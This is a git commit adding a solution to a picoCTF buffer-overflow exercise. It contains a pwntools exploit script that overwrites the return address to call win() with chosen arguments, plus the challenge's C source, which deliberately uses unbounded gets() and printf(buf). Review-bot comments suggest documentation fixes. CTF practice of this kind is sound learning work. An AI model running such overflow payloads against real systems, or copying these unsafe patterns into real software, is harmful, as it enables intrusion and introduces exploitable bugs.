pwn/buffer_overflow_2

Oystein Kristoffer Tveit 2024-09-03 19:46:13 +02:00
parent 2e33defa56
commit c56300256d
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
3 changed files with 74 additions and 0 deletions

31
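--- a/pwn/buffer_overflow_2/solve.py
+++ b/pwn/buffer_overflow_2/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+from pwn import *
+exe = ELF("./vuln")
+context.binary = exe
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+def conn():
+if args.REMOTE:
+r = remote(ADDR, PORT)
+else:
+r = process([exe.path])
+return r
+def main():
+r = conn()
+print(r.recvuntil(b"Please enter your string:"))
+offset = 112 # found with pwndbg
+payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+r.sendline(payload)
+print(r.recvall())
+r.close()
+if __name__ == "__main__":
+main()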
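Review bot: The `payload = ...` line in main() encodes three facts that nothing in the file explains: the 112-byte offset holds only for the exact `vuln` build committed next to it, the four `B` bytes stand in for the return address that `win` sees, and the two constants mirror the `arg1`/`arg2` checks in the C source. A one-line comment above it, such as `# layout: padding to saved return address | win() | dummy return | arg1 | arg2 (32-bit stack args)`, would keep the script readable once the binary is rebuilt or replaced. Separately, `ELF("./vuln")` resolves against the current working directory, so the script fails when started from anywhere else, and the hard-coded `saturn.picoctf.net 55214` endpoint looks like a per-instance port that will go stale. Resolving the binary relative to the script and reading the endpoint from `args.HOST` / `args.PORT` with the current values as defaults would avoid editing the file for each run.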

BIN
pwn/buffer_overflow_2/vuln Executable file

Binary file not shown.


@ -0,0 +1,43 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
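Review bot: Nothing in this file marks it as a deliberately vulnerable exercise target, so `gets(buf)` in vuln() and `printf(buf)` in win() read like ordinary code to anyone who lands here from a search. A header comment along the lines of `/* Intentionally vulnerable CTF target, do not reuse: gets() has no bound on the 100-byte buf, and printf(buf) treats file contents as a format string. */` would make that explicit, and it could name the safe forms `fgets(buf, sizeof buf, stdin)` and `printf("%s", buf)` for readers learning from it. The return value of `fgets(buf,FLAGSIZE,f)` in win() is also ignored, so an empty flag.txt leaves `buf` uninitialised before it is printed, and `f` is never closed. If the source is copied verbatim from the challenge (the page does not say), recording the compile flags used for the committed `vuln` binary alongside it would help, since the solver's offset depends on them.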